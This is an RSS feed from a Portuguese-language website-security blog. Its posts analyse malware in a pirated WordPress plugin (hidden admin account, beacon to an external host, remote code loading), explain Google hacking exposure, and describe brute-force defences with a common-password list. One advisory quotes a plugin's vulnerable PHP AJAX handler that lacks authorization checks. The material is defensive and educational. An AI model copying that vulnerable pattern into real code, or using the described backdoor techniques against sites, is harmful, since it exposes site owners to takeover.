<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos segurança wordpress - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/seguranca-wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/seguranca-wordpress/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Fri, 25 Jul 2025 18:12:47 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos segurança wordpress - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/seguranca-wordpress/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Plugins Piratas &#8211; Análise técnica</title>
		<link>https://ethsecurity.com.br/plugins-piratas-analise-tecnica/</link>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 25 Jul 2025 17:38:28 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://ethsecurity.com.br/?p=458</guid>

					<description><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar? Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Você ja se perguntou qual seria o perigo de instalar um plugin ou tema pirata em seu site? Será seguro? oque vai acontecer se eu usar?</p>
<p>Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.</p>
<p>Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/scan/" rel="attachment wp-att-470"><img fetchpriority="high" decoding="async" class="aligncenter wp-image-470 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png" alt="" width="925" height="268" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/scan.png 925w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-300x87.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-700x203.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-150x43.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/scan-768x223.png 768w" sizes="(max-width: 925px) 100vw, 925px" /></a></p>
<p>&nbsp;</p>
<p>A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/malware/" rel="attachment wp-att-471"><img decoding="async" class="aligncenter size-full wp-image-471" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png" alt="" width="1855" height="271" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/malware.png 1855w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-768x112.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/malware-1536x224.png 1536w" sizes="(max-width: 1855px) 100vw, 1855px" /></a></p>
<p>Em uma rápida analise o código acima faz:</p>
<ul>
<li>Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.</li>
<li>Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.</li>
<li>Envia informações do site (URL e data) para um servidor externo (llllll.my).</li>
<li>Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.</li>
<li>Carrega código remoto de outro servidor (panel.hac&#8230;..) sempre que o site é acessado.</li>
<li>Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.</li>
<li>Se instala de forma persistente, dificultando a detecção e remoção.</li>
</ul>
<p>Então resolvemos instalar o plugin e analisar o comportamento.</p>
<p>&nbsp;</p>
<p>Após o pluign instalado o que olhamos primeiro é a tabela de usuários</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/admin-list/" rel="attachment wp-att-472"><img decoding="async" class="aligncenter wp-image-472 " src="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png" alt="" width="541" height="296" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-700x383.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-300x164.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-150x82.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list-768x420.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/admin-list.png 951w" sizes="(max-width: 541px) 100vw, 541px" /></a></p>
<p>&nbsp;</p>
<p>Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/banco/" rel="attachment wp-att-473"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-473" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png" alt="" width="1068" height="156" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/banco.png 1068w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-300x44.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-700x102.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-150x22.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/banco-768x112.png 768w" sizes="auto, (max-width: 1068px) 100vw, 1068px" /></a></p>
<p>&nbsp;</p>
<p>Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/script/" rel="attachment wp-att-474"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-474" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png" alt="" width="560" height="261" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/script.png 560w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-300x140.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/script-150x70.png 150w" sizes="auto, (max-width: 560px) 100vw, 560px" /></a></p>
<p>Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.</p>
<p>Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/footer/" rel="attachment wp-att-475"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-475" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png" alt="" width="1876" height="138" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/footer.png 1876w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-300x22.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-700x51.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-150x11.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-768x56.png 768w, https://ethsecurity.com.br/wp-content/uploads/2025/07/footer-1536x113.png 1536w" sizes="auto, (max-width: 1876px) 100vw, 1876px" /></a></p>
<p>Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:</p>
<p><a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/outbound/" rel="attachment wp-att-476"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-476" src="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png" alt="" width="786" height="251" srcset="https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound.png 786w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-300x96.png 300w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-700x224.png 700w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-150x48.png 150w, https://ethsecurity.com.br/wp-content/uploads/2025/07/outbound-768x245.png 768w" sizes="auto, (max-width: 786px) 100vw, 786px" /></a></p>
<p>&nbsp;</p>
<p>Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/plugins-piratas-analise-tecnica/">Plugins Piratas &#8211; Análise técnica</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">458</post-id>	</item>
		<item>
		<title>Proteja seu site: Como evitar o Google Hacking.</title>
		<link>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/</link>
					<comments>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sun, 16 Jun 2019 20:01:45 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=334</guid>

					<description><![CDATA[<p>Você já ouviu falar de Google Hacking? como isso é possível? quais as boas práticas para evitar ser hackeado através dessa técnica? vamos responder essas perguntas neste post. Conceito: Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/">Proteja seu site: Como evitar o Google Hacking.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Você já ouviu falar de Google Hacking? como isso é possível? quais as boas práticas para evitar ser hackeado através dessa técnica? vamos responder essas perguntas neste post.</p>
<h3>Conceito:</h3>
<p>Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele faz isso? Imagine que você vai até uma cidade desconhecida e tem um amigo que mora lá há alguns anos, você precisa se deslocar até certos lugares que não conhece, então você pergunta a esse amigo onde esses lugares ficam e ele te instrui corretamente a melhor maneira de como encontrar os lugares, como isso é possível? Porque ele já esteve lá antes, o Google trabalha dessa mesma maneira, ele sabe o conteúdo dos sites porque já esteve la antes, já os visitou e indexou em seu banco de dados com os seus bots, seus buscadores que indexam os sites e os resultados são organizados em sua base de dados para que sejam mostrados nas pesquisas.</p>
<p>&nbsp;</p>
<h3>Controlando a indexação:</h3>
<p>Existe uma maneira de você controlar o que o Google e outros buscadores indexam em seu site, no arquivo <a href="https://support.google.com/webmasters/answer/6062596?hl=pt-BR">robots.txt</a> você pode definir os buscadores que poderão enxergar em seu site e o que poderão indexar, para que somente o conteúdo público seja mostrado.</p>
<p>&nbsp;</p>
<h3>Perigos:</h3>
<p>Assim como o Google indexa suas páginas ele também pode indexar tudo o que está na raiz de seu site, onde estão os scripts que fazem o mesmo funcionar, através desta técnica de busca é possível encontrar endereços em que seus administradores deixaram arquivos que oferecem um grande risco a segurança, usando como exemplo do WordPress existem 3 grandes perigos.</p>
<p>&nbsp;</p>
<h3>Backups da base de dados:</h3>
<p>Uma base de dados na raiz do site fica disponível para download com várias informações críticas de segurança, as mais críticas são o usuário e o hash da senha, com essas informações em mãos um terceiro mal intencionado pode fazer um ataque de bruteforce no hash e conseguir acesso à área administrativa de seu WordPress.</p>
<h3>Backup compactado de seus arquivos:</h3>
<p>Da mesma maneira que alguém encontra  um arquivo .sql com o Google Hacking, é possível encontrar arquivos compactados, como o zip ou tar.gz, no caso do WordPress dentro desse arquivo compactado estará o wp-config.php, expondo assim o usuário e senha do banco de dados, fazendo com que seja possível acessar o mesmo e alterar a senha ou adicionar um novo usuário administrador.</p>
<h3>WordPress sem o wp-config.php configurado:</h3>
<p>Este é o mais perigoso entre eles, pois caso você deixe uma instalação do WordPress em branco em seu docummet root, invasores buscarão por essa falha e quando a encontrarem  farão uma nova instalação do WordPress utilizando uma base de dados externa, dando-lhe total acesso administrativo para upload de backdoors, páginas de phsihing e outros tipos de pragas virtuais que assolam vários sites pelo mundo.</p>
<p>&nbsp;</p>
<h3>Conclusão:</h3>
<p>Com isso vemos que é preciso deixar somente o necessário na raiz de seu site e evitar deixa-lo como repositório para evitar surpresas desagradáveis, caso tenham algum dúvida sobre o conteúdo fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/">Proteja seu site: Como evitar o Google Hacking.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/proteja-seu-site-como-evitar-o-google-hacking/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">334</post-id>	</item>
		<item>
		<title>Vulnerabilidade sendo explorada no plugin fb-messenger-live-chat</title>
		<link>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-fb-messenger-live-chat/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-fb-messenger-live-chat/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sun, 26 May 2019 15:09:32 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[Sem categoria]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[vulnerabildiade de plugins]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=320</guid>

					<description><![CDATA[<p>Imagine poder utilizar o messenger do Facebook para falar diretamente com os visitantes de seu site, pois é essa a funcionalidade que o plugin que estamos falando proporciona para seus usuários, porém quem não faz atualizações periódicas em seus plugins do WordPress pode ter uma desagradável surpresa. &#160; Recentemente foi publicada uma falha de Cross [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-fb-messenger-live-chat/">Vulnerabilidade sendo explorada no plugin fb-messenger-live-chat</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Imagine poder utilizar o messenger do Facebook para falar diretamente com os visitantes de seu site, pois é essa a funcionalidade que o plugin que estamos falando proporciona para seus usuários, porém quem não faz atualizações periódicas em seus plugins do WordPress pode ter uma desagradável surpresa.</p>
<p>&nbsp;</p>
<p>Recentemente foi publicada uma falha de Cross Site Scripting (XSS) no plugin <a href="https://wordpress.org/plugins/fb-messenger-live-chat/">Live Chat with Facebook Messenger</a> conforme citado em nosso blog parceiro, essa falha está sendo amplamente explorada na internet, visto que está instalado em mais de 30.000 sites WordPress.</p>
<p>&nbsp;</p>
<h3>A falha:</h3>
<p>Por razões de funcionalidade o plugin permite a  alteração de opções na tabela de configurações do WordPress, a wp_options, porém a falta de uma proteção adequada permite que a opção ztb_domainid seja alterada e assim redirecionando o site para outros domínios maliciosos.</p>
<p>Como é possível ver no trecho de código abaixo, as opções <code>wp_ajax_update_zb_fbc_code</code>(para usuários autenticados) e <code>wp_ajax_nopriv_update_zb_fbc_code</code>(para usuários não autenticados),  usam a mesma função “ <code>update_zb_fbc_code</code>“, Assim, permitindo que qualquer usuário (logado ou não) modifique as configurações do plugin.</p>
<p><span class="hljs-attribute">154</span> add_action(<span class="hljs-string">&#8220;wp_ajax_update_zb_fbc_code&#8221;</span>, <span class="hljs-string">&#8220;update_zb_fbc_code&#8221;</span>); <span class="hljs-attribute">155</span> add_action(<span class="hljs-string">&#8220;wp_ajax_nopriv_update_zb_fbc_code&#8221;</span>, <span class="hljs-string">&#8220;update_zb_fbc_code&#8221;</span>);</p>
<p>Juntando isso ao fato da função insert_zb_fbc_code abaixo não possuir checagem de privilégios para evitar problemas de segurança, a falha pode ser facilmente explorada:</p>
<pre class="php"><span class="hljs-number">157</span> <strong><span class="hljs-function"><span class="hljs-keyword">function</span></span></strong><span class="hljs-function"> <span class="hljs-title">update_zb_fbc_code</span><span class="hljs-params">()</span></span>{
<span class="hljs-number">158</span>	header(<span class="hljs-string">'Access-Control-Allow-Origin: *'</span>);
<span class="hljs-number">159</span>   header(<span class="hljs-string">'Access-Control-Allow-Credentials: true'</span>);
<span class="hljs-number">160</span>	$domain = addslashes($_REQUEST[<span class="hljs-string">'domain'</span>]);
<span class="hljs-number">161</span>	$public_key = addslashes($_REQUEST[<span class="hljs-string">'access'</span>]);
<span class="hljs-number">162</span>	$id = intval($_REQUEST[<span class="hljs-string">'customer'</span>]);
<span class="hljs-number">163</span>	$zbEmail = addslashes($_REQUEST[<span class="hljs-string">'email'</span>]);
<span class="hljs-number">164</span>	<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>($domain) || <span class="hljs-keyword">empty</span>($domain)){
<span class="hljs-number">165</span>		header(<span class="hljs-string">"Location: "</span>.admin_url().<span class="hljs-string">"admin.php?page=zb_fbc"</span>);
<span class="hljs-number">166</span>	}<span class="hljs-keyword">else</span>{
<span class="hljs-number">167</span>		update_option( <span class="hljs-string">'ztb_domainid'</span>, $domain );
<span class="hljs-number">168</span>		update_option( <span class="hljs-string">'ztb_access_key'</span>, $public_key );
<span class="hljs-number">169</span>		update_option( <span class="hljs-string">'ztb_id'</span>, $id );
<span class="hljs-number">170</span>		update_option( <span class="hljs-string">'ztb_email'</span>, $zbEmail );
<span class="hljs-number">171</span>		update_option( <span class="hljs-string">'ztb_status_disconnect'</span>, <span class="hljs-number">2</span> );
<span class="hljs-number">172</span>		wp_send_json( <span class="hljs-keyword">array</span>(
<span class="hljs-number">173</span>			<span class="hljs-string">'error'</span> =&gt; <strong><span class="hljs-keyword">false</span></strong>,
<span class="hljs-number">174</span>			<span class="hljs-string">'message'</span> =&gt; <span class="hljs-string">'Update Zotabox embedded code successful !'</span> 
<span class="hljs-number">175</span>			)
<span class="hljs-number">176</span>		);
<span class="hljs-number">177</span>	}
<span class="hljs-number">178</span> }</pre>
<h3></h3>
<h3>Atualização:</h3>
<p>Fizemos o teste na versão 1.4.9 e a falha foi devidamente sanada, sendo assim se você utiliza esse plugin o atualize o mais rápido possível.</p>
<p>&nbsp;</p>
<p>Caso esteja com seu site redirecionando e não sabe como resolver <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">entre em contato</a> conosco para ajuda especializada.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-fb-messenger-live-chat/">Vulnerabilidade sendo explorada no plugin fb-messenger-live-chat</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-fb-messenger-live-chat/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">320</post-id>	</item>
		<item>
		<title>Ataques de força bruta (bruteforce), como se proteger.</title>
		<link>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/</link>
					<comments>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sat, 04 May 2019 10:52:50 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[Sem categoria]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=279</guid>

					<description><![CDATA[<p>Imagine que em suas mãos está um daqueles cadeados de segredo de 4 dígitos com os algarismos de 0 a 9, você precisa abrir aquele cadeado porém não sabe a combinação correta, então você começa a inserir números aleatórios na esperança de que o cadeado abra, o que vai ocorrer se o fabricante tiver inserido [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/">Ataques de força bruta (bruteforce), como se proteger.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Imagine que em suas mãos está um daqueles cadeados de segredo de 4 dígitos com os algarismos de 0 a 9, você precisa abrir aquele cadeado porém não sabe a combinação correta, então você começa a inserir números aleatórios na esperança de que o cadeado abra, o que vai ocorrer se o fabricante tiver inserido uma sequência simples como 1234, ou 0000? como resultado o cadeado abrirá facilmente.</p>
<p>Agora imagine que você tem a capacidade de tentar várias combinações por segundo, assim como o Superman faria com sua incrível velocidade, ficaria fácil de descobrir o segredo, o mesmo se dá hoje com as senhas que você insere principalmente na área administrativa de seu site.</p>
<h3>Estatísticas:</h3>
<p>Uma empresa de segurança informou em um relatório as senhas mais utilizadas de 2018, e acreditem se quiser segue a lista das 25 primeiras:</p>
<ul style="color: #000000;">
<li>1. 123456</li>
<li>2. password</li>
<li>3. 123456789</li>
<li>4. 12345678</li>
<li>5. 12345</li>
<li>6. 111111</li>
<li>7. 1234567</li>
<li>8. sunshine</li>
<li>9. qwerty</li>
<li>10. iloveyou</li>
<li>11. princess</li>
<li>12. admin</li>
<li>13. welcome</li>
<li>14. 666666</li>
<li>15. abc123</li>
<li>16. football</li>
<li>17. 123123</li>
<li>18. monkey</li>
<li>19. 654321</li>
<li>20. !@#$%^&amp;*</li>
<li>21. charlie</li>
<li>22. aa123456</li>
<li>23. donald</li>
<li>24. password1</li>
<li>25. qwerty123</li>
</ul>
<p>Vemos no topo da lista a nossa campeã de todos os anos 123456, a qual não é preciso nem um ataque de bruteforce para ser quebrada.</p>
<h3>Como funciona o ataque:</h3>
<p>Primeiramente o que um hacker precisa saber é a URL administrativa de seu site, assim ocorre o primeiro erro dos administradores, não alterar o endereço padrão, no WordPress é wp-admin, no Joomla: administrator, Magento: admin e muitos que fazem sites com programação própria cometem o mesmo erro.</p>
<p>Não pensem que os atacantes fazem esse processo manualmente, existem muitos scanners de vulnerabilidade que possuem a função findadmin, que tenta várias URLs para encontrar o alvo, portanto, encontrar a área administrativa pode não ser uma tarefa difícil.</p>
<p>Encontrado o alvo do ataque vem a hora de adivinhar o usuário, outro grande erro dos administradores, que deixam os padrões como admin, master, administrator etc, inclusive no WordPress é possível encontrar o nome do administrador com uma técnica chamada de enumeração, assunto para os próximos capítulos desse blog.</p>
<p>Com essas informações em mãos o indivíduo pode começar um ataque com várias combinações de senhas, a fim de obter sucesso caso a senha utilizada seja de baixa complexidade.</p>
<p>Existem na internet wordlists com bilhões de senhas, um arquivo de texto pode conter até 5G de tamanho, isso os mais modestos.</p>
<h3>O que um ataque pode causar?</h3>
<p>Além da possibilidade de seu site ser invadido com essa técnica, são utilizados um grande número de recursos no ataque, fazendo com que seu site fique indisponível, o servidor fique offline ou com que o administrador deste bloqueie seu site a fim de preservar o uptime do host.</p>
<p>Mas, por que um bruteforce consome tantos recursos?</p>
<p>A fim de ilustrar, vamos fazer um login em um site WordPress utilizando a senha errada, veja o quanto de recursos de CPU consome somente a página de login:</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-288 size-full" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/cpu.jpg" alt="" width="764" height="129" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu.jpg 764w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-150x25.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-300x51.jpg 300w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-700x118.jpg 700w" sizes="auto, (max-width: 764px) 100vw, 764px" /></p>
<p>O processo funciona da seguinte maneira, as senhas ficam criptografadas no banco de dados, como não existe criptografia reversa para esse tipo de hash, o servidor precisa criptografar a senha digitada e comparar com o hash da senha no banco de dados com o intuito de validar a mesma. O hashda senha 123456 no WordPress fica no banco de dados dessa maneira:</p>
<p>$1$PIIEnrFJ$/VKH4QNrlTWr7tQCb9YkV0</p>
<p>O hash com somente um caractere alterado difere totalmente, mostrando a segurança desse tipo de criptografia:</p>
<p>12345:</p>
<p>$1$zNkKg4EY$CSks7WAfuICMFS70ZEPYn1</p>
<p>Esse processo de criptografia e comparação de hashs foi idealizado para executar poucas vezes, dessa forma não sobrecarregando o servidor, porém se não controlado, ataques de bruteforces podem realizar mai de 3 tentativas por segundo, tendo a indisponibilidade do site como resultado.</p>
<h3>O que você deve fazer?</h3>
<p>Para evitar os ataques de bruteforce você deve, primeiramente, ter uma senha forte, desse modo ela não será facilmente obtida através desse tipo de ataque.</p>
<p>Baseando-se no WordPress, o CMS mais utilizado no mundo, recomendamos primeiramente que altere a URL administrativa. Para isso pode-se utilizar vários plugins, como o rename wp-login.php.</p>
<p>Também altere o nome do usuário de admin para outro que você deseje, de difícil dedução, nas configurações do WordPress, em usuários é possível realizar essa ação:</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="size-medium wp-image-289 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/admin-300x200.jpg" alt="" width="300" height="200" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/admin-300x200.jpg 300w, https://ethsecurity.com.br/wp-content/uploads/2019/05/admin-150x100.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/admin.jpg 326w" sizes="auto, (max-width: 300px) 100vw, 300px" /></p>
<p>&nbsp;</p>
<p>Por último e mais importante, adicione um captcha na área administrativa de seu site, essa é a maior arma contra ataques de bruteforce, pois caso ele não seja feito por quem tenta realizar o login o servidor nem irá realizar a comparação das senhas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/">Ataques de força bruta (bruteforce), como se proteger.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">279</post-id>	</item>
		<item>
		<title>Vulnerabilidades sendo exploradas no plugin Social Warfare</title>
		<link>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Thu, 25 Apr 2019 03:49:16 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabildiade de plugins]]></category>
		<category><![CDATA[vulnerabildiade wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=236</guid>

